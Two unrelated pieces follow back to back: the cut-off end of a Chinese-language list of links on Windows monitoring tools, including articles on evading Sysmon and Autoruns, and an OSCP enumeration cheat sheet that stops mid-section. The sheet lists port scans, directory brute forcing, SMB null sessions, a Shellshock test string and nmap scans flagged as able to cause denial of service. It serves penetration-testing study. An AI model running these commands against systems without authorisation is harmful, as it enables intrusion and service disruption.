Methodology](https://www.youtube.com/watch?v=7eor4Gq1YXE) - 2019.09 [sans] [Parsing Sysmon Events for IR Indicators](https://digital-forensics.sans.org/blog/2019/09/25/parsing-sysmon-events-for-ir-indicators) - 2019.09 [blackhillsinfosec] [Getting Started With Sysmon](https://www.blackhillsinfosec.com/getting-started-with-sysmon/) - 2019.09 [osandamalith] [Unloading the Sysmon Minifilter Driver](https://osandamalith.com/2019/09/22/unloading-the-sysmon-minifilter-driver/) - 2019.09 [matterpreter] [Shhmon — Silencing Sysmon via Driver Unload](https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650) - 2019.09 [specterops] [Shhmon — Silencing Sysmon via Driver Unload](https://medium.com/p/682b5be57650) - 2019.09 [4hou] [如何逃逸Sysmon工具对DNS的监控](https://www.4hou.com/web/18660.html) - 2019.09 [olafhartong] [Sysmon 10.4 release](https://medium.com/p/7f7480300dff) - 2019.09 [blackhillsinfosec] [Webcast: Windows logging, Sysmon, and ELK](https://www.blackhillsinfosec.com/webcast-windows-logging-sysmon-and-elk/) - 2019.08 [blackhillsinfosec] [Webcast: Implementing Sysmon and Applocker](https://www.blackhillsinfosec.com/webcast-implementing-sysmon-and-applocker/) - 2019.07 [eforensicsmag] [Using Sysmon and ETW For So Much More | By David Kennedy](https://eforensicsmag.com/using-sysmon-and-etw-for-so-much-more-by-david-kennedy/) - 2019.06 [nosecurecode] [Sysmon in a Box](https://nosecurecode.com/2019/06/29/sysmon-in-a-box/) - 2019.06 [binarydefense] [Using Sysmon and ETW For So Much More - Binary Defense](https://www.binarydefense.com/using-sysmon-and-etw-for-so-much-more/) - 2019.06 [360] [如何规避Sysmon DNS监控](https://www.anquanke.com/post/id/180418/) - 2019.06 [SecurityWeekly] [Sysmon DNS Logging, Gravwell - PSW #608](https://www.youtube.com/watch?v=e_E6F1G6b88) - 2019.06 [xpnsec] [Evading Sysmon DNS Monitoring](https://blog.xpnsec.com/evading-sysmon-dns-monitoring/) *** ## <a id="dbc42caf465566897ecbb644fed1f271"></a>Procmon ### <a id="518d80dfb8e9dda028d18ace1d3f3981"></a>工具 ### <a id="af06263e9a92f6036dc5d4c4b28b9d8c"></a>文章 - 2019.03 [eforensicsmag] [DYNAMIC MALWARE ANALYSIS – PROCESS MONITOR AND EXPLORER | By Prasanna B Mundas](https://eforensicsmag.com/dynamic-malware-analysis-process-monitor-and-explorer-by-prasanna-b-mundas/) - 2018.10 [hexacorn] [Process monitoring/Process cmd line monitoring – data sources](http://www.hexacorn.com/blog/2018/10/27/process-monitoring-process-cmd-line-monitoring-data-sources/) - 2018.10 [guyrleech] [Dynamically Creating Process Monitor Filters](https://guyrleech.wordpress.com/2018/10/01/dynamically-creating-process-monitor-filters/) - 2018.02 [appsecconsulting] [PCI Time-Based Requirements as a Starting Point for Business-As-Usual Process Monitoring](https://appsecconsulting.com/blog/pci-time-based-requirements-as-a-starting-point-for-business-as-usual-proce) - 2017.07 [arxiv] [[1707.03821] Process Monitoring on Sequences of System Call Count Vectors](https://arxiv.org/abs/1707.03821) - 2017.06 [lowleveldesign] [How to decode managed stack frames in procmon traces](https://lowleveldesign.org/2017/06/23/how-to-decode-managed-stack-frames-in-procmon-traces/) - 2017.02 [lowleveldesign] [When procmon trace is not enough](https://lowleveldesign.org/2017/02/20/when-procmon-trace-is-not-enough/) - 2017.02 [guyrleech] [When even Process Monitor isn’t enough](https://guyrleech.wordpress.com/2017/02/13/when-even-process-monitor-isnt-enough/) - 2016.09 [dist67] [Malware: Process Explorer & Procmon](https://www.youtube.com/watch?v=vq12OCVm2-o) - 2015.06 [guyrleech] [Advanced Procmon Part 2 – Filtering inclusions](https://guyrleech.wordpress.com/2015/06/22/advanced-procmon-part-2-filtering-inclusions/) - 2015.02 [vimeo] [Innuendo keylogger process monitor](https://vimeo.com/119460494) - 2014.12 [guyrleech] [Advanced Procmon Part 1 – Filtering exclusions](https://guyrleech.wordpress.com/2014/12/25/advanced-procmon-part-1-filtering-exclusions/) - 2014.07 [toolswatch] [[New Tool] El Jefe v2.1 – Windows Process Monitoring Released](http://www.toolswatch.org/2014/07/new-tool-el-jefe-v2-1-windows-process-monitoring-released/) - 2012.04 [toolswatch] [Process Monitor v3.0 Released](http://www.toolswatch.org/2012/04/process-monitor-v3-0-released/) - 2011.08 [zeltser] [Process Monitor Filters for Malware Analysis and Forensics](https://zeltser.com/process-monitor-filters-for-malware-analysis/) - 2011.04 [toolswatch] [(Windows SysInternals) Process Monitor v2.95 released](http://www.toolswatch.org/2011/04/windows-sysinternals-process-monitor-v2-95-released/) - 2011.01 [toolswatch] [(Windows SysInternals) Process Monitor v2.94 released](http://www.toolswatch.org/2011/01/windows-sysinternals-process-monitor-v2-94-released/) - 2010.09 [pediy] [[翻译]Process Monitor中文手册](https://bbs.pediy.com/thread-120303.htm) *** ## <a id="7da65659e7e463379d32be654003662c"></a>Autoruns ### <a id="c206afa40ed90711b49a572feb1e0c5b"></a>工具 ### <a id="23c49d681177101f0f7d15fcd15f2124"></a>文章 - 2019.05 [jdferrell3] [Scheduled Task command with space “hides” the file from Autoruns](https://medium.com/p/1c7bfe38a67c) - 2019.04 [sans] [Offline Autoruns Revisited - Auditing Malware Persistence](https://digital-forensics.sans.org/blog/2019/04/29/offline-autoruns-revisited) - 2019.04 [jdferrell3] [Autoruns fails to resolve file path for a scheduled task with a space in the file path](https://medium.com/p/ddd871b32f17) - 2018.12 [hexacorn] [I fought the Autoruns, and Autoruns won…](http://www.hexacorn.com/blog/2018/12/16/i-fought-the-autoruns-and-autoruns-won/) - 2018.07 [KyleHanslovan] [RE: Evading Autoruns PoCs on Windows 10](https://medium.com/p/dd810d7e8a3f) - 2018.07 [sans] [Using AutorunsToWinEventLog ](https://isc.sans.edu/forums/diary/Using+AutorunsToWinEventLog/23840/) - 2018.04 [oddvar] [利用Image File Execution Options中的GlobalFlags实现驻留, 绕过Autoruns.exe检测](https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/) - 2018.03 [oddvar] [利用RunOnceEx实现驻留, 能够躲避Autoruns.exe监测](https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/) - 2018.01 [p0w3rsh3ll] [AutoRuns module compatible with PowerShell Core 6.0](https://p0w3rsh3ll.wordpress.com/2018/01/19/autoruns-module-compatible-with-powershell-core-6-0/) - 2017.11 [360] [那些“躲避”微软autoruns工具的方法](https://www.anquanke.com/post/id/87176/) - 2017.10 [conscioushacker] [Evading Microsoft’s AutoRuns](https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/) - 2016.09 [defensivedepth] [Integrating Autoruns with Security Onion](https://defensivedepth.com/2016/09/10/integrating-autoruns-with-security-onion/) - 2015.07 [sans] [Autoruns and VirusTotal](https://isc.sans.edu/forums/diary/Autoruns+and+VirusTotal/19933/) - 2012.11 [sketchymoose] [Autoruns](https://sketchymoose.blogspot.com/2012/11/autoruns.html) - 2010.06 [sans] [Autoruns and Dead Computer Forensics](https://digital-forensics.sans.org/blog/2010/06/28/autoruns-dead-forensics) *** ## <a id="fdae9f5a384a5c230e577ac972be2de4"></a>ProcessExplorer ### <a id="1b24c5ac9ca199d0397380f902868c73"></a>文章 - 2018.09 [notsoshant] [A small introduction to Process Explorer](https://medium.com/p/458db20eee9a) - 2017.12 [hasherezade] [Experiment: ProcessExplorer vs my "lil_calc"](https://www.youtube.com/watch?v=S3iCZ3BKkLk) - 2016.05 [malwarebytes] [Process Explorer: part two](https://blog.malwarebytes.com/101/2016/05/process-explorer-part-2/) - 2016.05 [malwarebytes] [Process Explorer: an introduction](https://blog.malwarebytes.com/101/2016/05/process-explorer-an-introduction/) - 2015.07 [sans] [Process Explorer and VirusTotal](https://isc.sans.edu/forums/diary/Process+Explorer+and+VirusTotal/19931/) - 2014.01 [virusbulletin] [VirusTotal support integrated into new version of Process Explorer](https://www.virusbulletin.com/blog/2014/01/virustotal-support-integrated-new-version-process-explorer/) - 2014.01 [malwarebytes] [Process Explorer Now Including VirusTotal Support](https://blog.malwarebytes.com/cybercrime/2014/01/process-explorer-now-including-virustotal-support/) - 2013.12 [dist67] [Using Process Explorer's Find Window's Process](https://www.youtube.com/watch?v=kAksKTD9v70) - 2013.01 [securityblog] [Process Explorer](http://securityblog.gr/1582/process-explorer/) - 2012.06 [toolswatch] [Process Explorer v15.2 Released](http://www.toolswatch.org/2012/06/process-explorer-v15-2-released/) - 2011.12 [toolswatch] [Process Explorer v15.1 Released](http://www.toolswatch.org/2011/12/process-explorer-v15-1-released/) - 2011.05 [toolswatch] [(Windows SysInternals) Process Explorer v14.11 released](http://www.toolswatch.org/2011/05/windows-sysinternals-process-explorer-v14-11-released/) - 2011.03 [toolswatch] [(Windows SysInternals) Process Explorer v14.1 released](http://www.toolswatch.org/2011/03/windows-sysinternals-process-explorer-v14-1-released/) - 2005.08 [sans] [Slow Sunday; CA Message Queuing Vulns; Process Explorer Vuln; Infocon: Green Redux](https://isc.sans.edu/forums/diary/Slow+Sunday+CA+Message+Queuing+Vulns+Process+Explorer+Vuln+Infocon+Green+Redux/633/) *** ## <a id="836a3b7a9763957991fce4355439ad06"></a>其他 ### <a id="17fd6ceec67d0beed0bf54b117218123"></a>工具 ### <a id="ed25f17a9dd8092131cf45121e24aa68"></a>文章 - 2019.11 [code610] [Sysinternals Suite - quick review for Windows 10](https://code610.blogspot.com/2019/11/sysinternals-suite-quick-review-for.html) - 2018.01 [hexacorn] [Yet another way to hide from Sysinternals’ tools, part 1.5](http://www.hexacorn.com/blog/2018/01/19/yet-another-way-to-hide-from-sysinternals-tools-part-1-5/) - 2018.01 [hexacorn] [利用"环境变量"躲避 Sysinternals 工具检测的另类方式. Autoruns/ProcessExplorer 均无法检测到使用此方式设置的自启动项](http://www.hexacorn.com/blog/2018/01/04/yet-another-way-to-hide-from-sysinternals-tools/) - 2017.10 [360] [如何利用SysInternals Suite来隐藏你的进程](https://www.anquanke.com/post/id/87004/) - 2017.08 [chrislazari] [Removing Crypto-Mining Malware from Windows using SysInternals Tools](https://chrislazari.com/removing-crypto-mining-malware-windows-using-sysinternals/) - 2016.11 [hackers] [Digital Forensics, Part 8: Live Analysis with sysinternals](https://www.hackers-arise.com/single-post/2016/11/29/Digital-Forensics-Part-7-Live-Analysis-with-sysinternals) - 2015.11 [holisticinfosec] [toolsmith #110: Sysinternals vs Kryptic](https://holisticinfosec.blogspot.com/2015/11/toolsmith110-sysinternals-vs-kryptic.html) - 2014.11 [hexacorn] [Sysinternals’ Eulagoogoolizer](http://www.hexacorn.com/blog/2014/11/30/sysinternals-eulagoogoolizer/) - 2014.07 [lowleveldesign] [Collect .NET applications traces with sysinternals tools](https://lowleveldesign.org/2014/07/30/collect-net-applications-traces-with-sysinternals-tools/) - 2011.04 [toolswatch] [New Sysinternals Suite Available](http://www.toolswatch.org/2011/04/new-sysinternals-suite-available/) - 2011.04 [pediy] [[翻译]The Case of the Sysinternals-Blocking Malware——虚拟桌面程序来协助你手动杀毒](https://bbs.pediy.com/thread-131934.htm) - 2011.04 [toolswatch] [Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1](http://www.toolswatch.org/2011/04/analyzing-a-stuxnet-infection-with-the-sysinternals-tools-part-1/) - 2011.03 [toolswatch] [(Windows SysInternals) VMMap v3.03 released](http://www.toolswatch.org/2011/03/windows-sysinternals-vmmap-v3-03-released/) - 2011.03 [toolswatch] [(Windows SysInternals) ProcDump v3.03 released](http://www.toolswatch.org/2011/03/windows-sysinternals-procdump-v3-03-released/) - 2009.12 [sans] [Updates to Sysinternals Toolkit](https://isc.sans.edu/forums/diary/Updates+to+Sysinternals+Toolkit/7675/) - 2009.09 [sans] [Sysinternals Tools Updates](https://isc.sans.edu/forums/diary/Sysinternals+Tools+Updates/7153/) - 2009.05 [sans] [Sysinternals Updates 3 Applications](https://isc.sans.edu/forums/diary/Sysinternals+Updates+3+Applications/6373/) - 2008.10 [sans] [Updates to SysInternals tools!](https://isc.sans.edu/forums/diary/Updates+to+SysInternals+tools/5198/) - 2008.07 [pediy] [[原创]Sysinternal出品工具TcpView的驱动逆向源代码](https://bbs.pediy.com/thread-69543.htm) - 2006.07 [sans] [Winternals/SysInternals acquired by Microsoft](https://isc.sans.edu/forums/diary/WinternalsSysInternals+acquired+by+Microsoft/1493/) # <a id="b478e9a9a324c963da11437d18f04998"></a>工具 *** ## <a id="f9fad1d4d1f0e871a174f67f63f319d8"></a>新添加的 - [**9553**星][9d] [PS] [lukesampson/scoop](https://github.com/lukesampson/scoop) A command-line installer for Windows. - [**4868**星][10m] [Py] [10se1ucgo/disablewintracking](https://github.com/10se1ucgo/disablewintracking) Uses some known methods that attempt to minimize tracking in Windows 10 - [**3648**星][9d] [C#] [kohsuke/winsw](https://github.com/kohsuke/winsw) A wrapper executable that can be used to host any executable as an Windows service, in a liberal license - [**3409**星][1m] [C] [microsoft/windows-driver-samples](https://github.com/microsoft/windows-driver-samples) This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples. - [**3222**星][9d] [C++] [0xz0f/z0fcourse_reverseengineering](https://github.com/0xz0f/z0fcourse_reverseengineering) Reverse engineering focusing on x64 Windows. - [**2132**星][2m] [C++] [darthton/blackbone](https://github.com/darthton/blackbone) Windows memory hacking library - [**2052**星][1m] [C++] [mhammond/pywin32](https://github.com/mhammond/pywin32) Python for Windows (pywin32) Extensions - [**700**星][9d] [PS] [farag2/windows-10-setup-script](https://github.com/farag2/windows-10-setup-script) Windows 10 1903/1909 自动化配置脚本 - [**666**星][28d] [C] [virtio-win/kvm-guest-drivers-windows](https://github.com/virtio-win/kvm-guest-drivers-windows) KVM / QEMU Windows来宾驱动程序 - [**628**星][3m] [C] [mrexodia/titanhide](https://github.com/mrexodia/titanhide) 用于隐藏某些进程调试器的驱动程序 - [**278**星][1y] [Py] [hakril/pythonforwindows](https://github.com/hakril/pythonforwindows) 简化Python与Windows操作系统交互的库 - [**216**星][5m] [adguardteam/adguardforwindows](https://github.com/adguardteam/adguardforwindows) Windows系统范围的AdBlocker *** ## <a id="6d2fe834b7662ecdd48c17163f732daf"></a>Environment&&环境&&配置 - [**1530**星][1y] [PS] [joefitzgerald/packer-windows](https://github.com/joefitzgerald/packer-windows) 使用Packer创建Vagrant boxes的模板 - [**1368**星][3m] [Go] [securitywithoutborders/hardentools](https://github.com/securitywithoutborders/hardentools) 禁用许多有危险的Windows功能 - [**1167**星][11d] [HTML] [nsacyber/windows-secure-host-baseline](https://github.com/nsacyber/Windows-Secure-Host-Baseline) Windows 10和Windows Server 2016 DoD 安全主机基准设置的配置指南 - [**1054**星][9d] [adolfintel/windows10-privacy](https://github.com/adolfintel/windows10-privacy) Win10隐私指南 - [**545**星][11d] [PS] [stefanscherer/packer-windows](https://github.com/stefanscherer/packer-windows) Windows Packer 模板:Win10, Server 2016, 1709, 1803, 1809, 2019, 1903, Insider with Docker *** ## <a id="c3cda3278305549f4c21df25cbf638a4"></a>内核&&驱动 - [**943**星][11m] [C] [microsoft/windows-driver-frameworks](https://github.com/microsoft/windows-driver-frameworks) Windows驱动框架(WDF) - [**891**星][1m] [axtmueller/windows-kernel-explorer](https://github.com/axtmueller/windows-kernel-explorer) Windows内核研究工具 - [**515**星][7m] [Py] [rabbitstack/fibratus](https://github.com/rabbitstack/fibratus) Windows内核探索和跟踪工具 - [**496**星][3m] [C] [jkornev/hidden](https://github.com/jkornev/hidden) Windows驱动,带用户模式接口:隐藏文件系统和注册表对象、保护进程等 - [**288**星][9d] [PS] [microsoftdocs/windows-driver-docs](https://github.com/MicrosoftDocs/windows-driver-docs) 官方Windows驱动程序工具包文档 *** ## <a id="920b69cea1fc334bbc21a957dd0d9f6f"></a>注册表 - [**521**星][9d] [Batchfile] [chef-koch/regtweaks](https://github.com/chef-koch/regtweaks) Windows注册表调整(Win 7-Win 10) - [**293**星][2m] [Py] [williballenthin/python-registry](https://github.com/williballenthin/python-registry) 用于对Windows NT注册表文件进行纯读取访问的Python库 *** ## <a id="d295182c016bd9c2d5479fe0e98a75df"></a>系统调用 - [**757**星][4m] [HTML] [j00ru/windows-syscalls](https://github.com/j00ru/windows-syscalls) Windows 系统调用表(NT/2000/XP/2003/Vista/2008/7/2012/8/10) - [**349**星][20d] [C] [hfiref0x/syscalltables](https://github.com/hfiref0x/syscalltables) Windows NT x64系统调用表 *** ## <a id="1afda3039b4ab9a3a1f60b179ccb3e76"></a>其他 - [**1007**星][12d] [C++] [henrypp/simplewall](https://github.com/henrypp/simplewall) 为Windows 过滤平台提供的配置界面 - [**981**星][5m] [C] [basil00/divert](https://github.com/basil00/divert) 用户模式数据包拦截库,适用于Win 7/8/10 - [**742**星][4m] [Py] [diyan/pywinrm](https://github.com/diyan/pywinrm) Python实现的WinRM客户端 - [**605**星][21d] [C] [hfiref0x/winobjex64](https://github.com/hfiref0x/winobjex64) Windows对象浏览器. x64 - [**475**星][2m] [C#] [microsoft/dbgshell](https://github.com/microsoft/dbgshell) PowerShell编写的Windows调试器引擎前端 - [**428**星][12d] [C] [samba-team/samba](https://github.com/samba-team/samba) 适用于Linux和Unix的标准Windows interoperability程序套件 - [**412**星][2m] [Jupyter Notebook] [microsoft/windowsdefenderatp-hunting-queries](https://github.com/microsoft/windowsdefenderatp-hunting-queries) 在MS Defender ATP中进行高级查询的示例 - [**396**星][16d] [C#] [microsoft/binskim](https://github.com/microsoft/binskim) 二进制静态分析工具,可为PE和ELF二进制格式提供安全性和正确性分析 - [**377**星][2m] [Ruby] [winrb/winrm](https://github.com/winrb/winrm) 在Windows中使用WinRM的功能调用原生对象的SOAP库。Ruby编写 # <a id="3939f5e83ca091402022cb58e0349ab8"></a>文章 *** ## <a id="8e1344cae6e5f9a33e4e5718a012e292"></a>新添加 - 2018.11 [vimeo] [INNUENDO Telemetry Gathering and Incidence Response](https://vimeo.com/299067524) - 2018.01 [4sysops] [Search Active Directory with the PowerShell cmdlet Get‑ADComputer](https://4sysops.com/archives/search-active-directory-with-the-powershell-cmdlet-get%e2%80%91adcomputer/) - 2017.06 [faiz] [#CloudComputing : #Security, #Vulnerabilities, #Privacy, #Storage, #Multicloud Overview SERIES #1](https://www.peerlyst.com/posts/cloudcomputing-security-vulnerabilities-privacy-storage-multicloud-overview-series-1-faiz-a-shaikh-mba-mle-sm-cisa-itsm) - 2017.03 [paloaltonetworks] [Pulling Back the Curtains on EncodedCommand PowerShel](https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/) - 2017.02 [vexillium] [Windows Kernel Local Denial-of-Service #2: win32k!NtDCompositionBeginFrame (Windows 8-10)](http://j00ru.vexillium.org/?p=3151) - 2017.02 [vexillium] [Windows Kernel Local Denial-of-Service #2: win32k!NtDCompositionBeginFrame (Windows 8-10)](https://j00ru.vexillium.org/2017/02/windows-kernel-local-denial-of-service-2/) - 2017.01 [trustedsec] [Circumventing EncodedCommand and IEX Detection in PowerShell](https://www.trustedsec.com/2017/01/circumventing-encodedcommand-detection-powershell/) - 2013.11 [mikefrobbins] [Windows 8.1 RSAT PowerShell Cmdlets Get-ADUser & Get-ADComputer : One or more Properties are Invalid](http://mikefrobbins.com/2013/11/07/windows-8-1-rsat-powershell-cmdlets-get-aduser-get-adcomputer-one-or-more-properties-are-invalid/) # 贡献 内容为系统自动导出, 有任何问题请提issue
# OSCP Enumeration Cheat Sheet A collection of commands and tools used for conducting enumeration during my OSCP journey. ## Description This is an enumeration cheat sheet that I created while pursuing the OSCP. It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. Some of these commands are based on those executed by the [Autorecon](https://github.com/Tib3rius/AutoRecon) tool. ## Disclaimer This cheat sheet should not be considered to be complete and only represents a snapshot in time when I used these commands for performing enumeration during my OSCP journey. These commands should only be used for educational purposes or authorised testing. Table of Contents ================= * [Enumeration](#enumeration) * [Host](#host) * [Nmap](#nmap) * [Proxychains](#proxychains) * [Autorecon](#autorecon) * [Services](#services) * [FTP (21/tcp)](#ftp-21tcp) * [SSH (22/tcp)](#ssh-22tcp) * [SMTP (25/tcp)](#smtp-25tcp) * [DNS (53/tcp, 53/udp)](#dns-53tcp-53udp) * [HTTP/HTTPS (80/tcp, 443/tcp)](#httphttps-80tcp-443tcp) * [Kerberos (88/tcp, 464/tcp)](#kerberos-88tcp-464tcp) * [POP3/POP3S (110/tcp, 995/tcp)](#pop3pop3s-110tcp-995tcp) * [RPC (111/tcp, 135/tcp)](#rpc-111tcp-135tcp) * [ident (113/tcp)](#ident-113tcp) * [NTP (123/udp)](#ntp-123udp) * [NetBIOS-NS (137/udp)](#netbios-ns-137udp) * [SMB (139/tcp, 445/tcp)](#smb-139tcp-445tcp) * [IMAP/IMAPS (143/tcp, 993/tcp)](#imapimaps-143tcp-993tcp) * [SNMP (161/udp)](#snmp-161udp) * [LDAP (389/tcp, 3268/tcp)](#ldap-389tcp-3268tcp) * [Java RMI (1100/tcp)](#java-rmi-1100tcp) * [MSSQL (1433/tcp)](#mssql-1433tcp) * [Oracle TNS listener (1521/tcp)](#oracle-tns-listener-1521tcp) * [NFS (2049/tcp)](#nfs-2049tcp) * [MySQL (3306/tcp)](#mysql-3306tcp) * [RDP (3389/tcp)](#rdp-3389tcp) * [SIP (5060/udp)](#sip-5060udp) * [PostgreSQL (5432/tcp)](#postgresql-5432tcp) * [VNC (5900/tcp)](#vnc-5900tcp) * [AJP (8009/tcp)](#ajp-8009tcp) * [Active Directory](#active-directory) # Enumeration ## Host ### Nmap ```text # Full TCP port scan sudo nmap -Pn -p- -oN alltcp_ports.txt $ip # Full TCP port scan (safe scripts + version detection) sudo nmap -Pn -sC -sV -p- -oN alltcp.txt $ip # Top 20 UDP port scan sudo nmap -Pn -sU -sV -sC --top-ports=20 -oN top_20_udp_nmap.txt $ip ``` ### Proxychains ```text # Top 20 TCP port scan proxychains nmap -Pn -sT --top-ports=20 --open -oN top_20_tcp_nmap.txt $ip # Top 1000 TCP port scan proxychains nmap -Pn -sT --top-ports=1000 --open -oN top_1000_tcp_nmap.txt $ip # Scan TCP ports (safe scripts + version detection) proxychains nmap -Pn -sT -sC -sV -p 21,22,80 -oN tcp_nmap_sC_sV.txt $ip ``` ### Autorecon ```text # Scan single target sudo autorecon -o enumeration $ip # Scan multiple targets sudo autorecon -o enumeration $ip1 $ip2 $ip3 $ip4 ``` ## Services ### FTP (21/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 21 --script="banner,(ftp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "tcp_21_ftp_nmap.txt" $ip ``` ### SSH (22/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN tcp_22_ssh_nmap.txt $ip ``` ### SMTP (25/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 25 "--script=banner,(smtp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN tcp_25_smtp_nmap.txt $ip ``` [smtp-user-enum](https://pypi.org/project/smtp-user-enum) ```text /home/kali/.local/bin/smtp-user-enum -V -m RCPT -w -f '<[email protected]>' -d 'domain.local' -U "/usr/share/metasploit-framework/data/wordlists/unix_users.txt" $ip 25 2>&1 | tee "tcp_25_smtp_user-enum.txt" ``` ### DNS (53/tcp, 53/udp) ```text # Version detection + NSE scripts sudo nmap -Pn -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN udp_53_dns_nmap.txt $ip ``` ```text # Perform zone transfer (only works over port 53/tcp) dig axfr @$ip $domain 2>&1 | tee "tcp_53_dns_dig.txt" # Perform reverse DNS lookup (may display NS record containing domain name) nslookup $ip $ip # Brute force subdomains gobuster dns -d $domain -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 16 -o "tcp_53_dns_gobuster.txt" ``` ### HTTP/HTTPS (80/tcp, 443/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p $port "--script=banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN tcp_port_protocol_nmap.txt $ip ``` **Nikto** ```text nikto -h $url 2>&1 | tee "tcp_port_protocol_nikto.txt" ``` **Directory brute force** ```text gobuster dir -u $url -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -s "200,204,301,302,307,403,500" -k -t 16 -o "tcp_port_protocol_gobuster.txt" python3 /opt/dirsearch/dirsearch.py -u $url -t 16 -e txt,html,php,asp,aspx,jsp -f -x 403 -w /usr/share/seclists/Discovery/Web-Content/common.txt --plain-text-report="tcp_port_protocol_dirsearch.txt" Dirbuster (GUI): only perform extension brute force - disable 'Brute Force Dirs' wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 -t 16 $url/FUZZ 2>&1 | tee "tcp_port_http_wfuzz.txt" # Directory brute force recursively with max depth = 2 python3 /opt/dirsearch/dirsearch.py -u $url/apps/ -t 16 -e txt,html,php -f -x 403 -r -R 2 -w /usr/share/seclists/Discovery/Web-Content/common.txt --plain-text-report="tcp_port_protocol_dirsearch_apps.txt" ``` **Whatweb** ```text whatweb --color=never --no-errors -a 3 -v $url 2>&1 | tee "tcp_port_protocol_whatweb.txt" ``` **Wordpress** ```text # Enumerate vulnerable plugins and themes, timthumbs, wp-config.php backups, database exports, usernames and media IDs wpscan --url $url --no-update --disable-tls-checks -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee tcp_port_protocol_wpscan.txt # Enumerate all plugins wpscan --url $url --disable-tls-checks --no-update -e ap --plugins-detection aggressive -f cli-no-color 2>&1 | tee tcp_port_protocol_wpscan_plugins.txt ``` **Robots.txt** ```text /robots.txt ``` **Only get HTTP headers** ```text curl -I $url ``` **Cewl** ```text cewl $url/index.php -m 3 --with-numbers -w cewl.txt ``` **Drupal** ```text python3 drupwn --version 7.28 --mode enum --target $url droopescan scan drupal -u $url ``` **Shellshock** ```text # Check if bash vulnerable to CVE-2014-6271 (bash vulnerable if ‘vulnerable’ in output) env x='() { :;}; echo vulnerable' bash -c "echo this is a test" # Brute force CGI files gobuster dir -u $url/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "cgi,sh,pl,py" -s "200,204,301,302,307,403,500" -t 16 -o "tcp_port_protocol_gobuster_shellshock.txt" wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/CGIs.txt --hc 404 -t 16 $url/cgi-bin/FUZZ 2>&1 | tee "tcp_port_protocol_wfuzz.txt" Webmin uses cgi files - versions up to 1.700 vulnerable to shellshock (http://www.webmin.com/security.html) ``` ### Kerberos (88/tcp, 464/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p $port --script="banner,krb5-enum-users" -oN "tcp_port_kerberos_nmap.txt" $ip ``` ### POP3/POP3S (110/tcp, 995/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p $port "--script=banner,(pop3* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN tcp_port_pop3_nmap.txt $ip ``` ### RPC (111/tcp, 135/tcp) **msrpc/rpcbind** ```text # Version detection + NSE scripts nmap -Pn -sV -p $port --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN tcp_port_rpc_nmap.txt $ip ``` **rpcinfo** ```text # List all registered RPC programs rpcinfo -p $ip # Provide compact results rpcinfo -s $ip ``` **Null session** ```text rpcclient -U "" -N $ip srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall ``` ### ident (113/tcp) **Enumerate users services running as** ```text ident-user-enum $ip 22 25 80 445 ``` ### NTP (123/udp) ```text # Run ntp-info NSE script sudo nmap -sU -p 123 --script ntp-info $ip ``` ### NetBIOS-NS (137/udp) **enum4linux** ```text enum4linux -a -M -l -d $ip 2>&1 | tee "enum4linux.txt" ``` **nbtscan** ```text nbtscan -rvh $ip 2>&1 | tee "nbtscan.txt" ``` ### SMB (139/tcp, 445/tcp) ```text # Version detection + NSE scripts nmap -Pn -sV -p 445 "--script=banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" --script-args=unsafe=1 -oN tcp_445_smb_nmap.txt $ip ``` **smbmap** ```text # List share permissions smbmap -H $ip -P 445 2>&1 | tee -a "smbmap-share-permissions.txt"; smbmap -u null -p "" -H $ip -P 445 2>&1 | tee -a "smbmap-share-permissions.txt" # List share contents smbmap -H $ip -P 445 -R 2>&1 | tee -a "smbmap-list-contents.txt"; smbmap -u null -p "" -H $ip -P 445 -R 2>&1 | tee -a "smbmap-list-contents.txt" ``` **enum4linux** ```text enum4linux -a -M -l -d $ip 2>&1 | tee "enum4linux.txt" ``` **Enumerate Samba version (\*nix)** ```text # NB: change interface tcpdump listening on sudo ./smbver.sh $ip 139 ``` **Null session** ```text smbmap -H $ip smbclient -L //$ip/ -U '' -N ``` **Enumerate shares** ```text nmap --script smb-enum-shares -p 445 $ip ``` **Connect to wwwroot share (try blank password)** ```text smbclient \\\\$ip\\wwwroot ``` **Nmap scans for SMB vulnerabilities (NB: can cause DoS)** ```text # RRAS Service Overflow # https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-025 nmap -Pn -sV -p 445 --script="smb-vuln-ms06-025" --script-args="unsafe=1" -oN "tcp_445_smb_ms06-025.txt" $ip # DNS RPC Service Overflow # https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-029 nmap -Pn -sV -p 445 --script="smb-vuln-ms07-029" --script-args="unsafe=1" -oN "tcp_445_smb_ms07-029.txt" $ip # Server Service Vulnerability 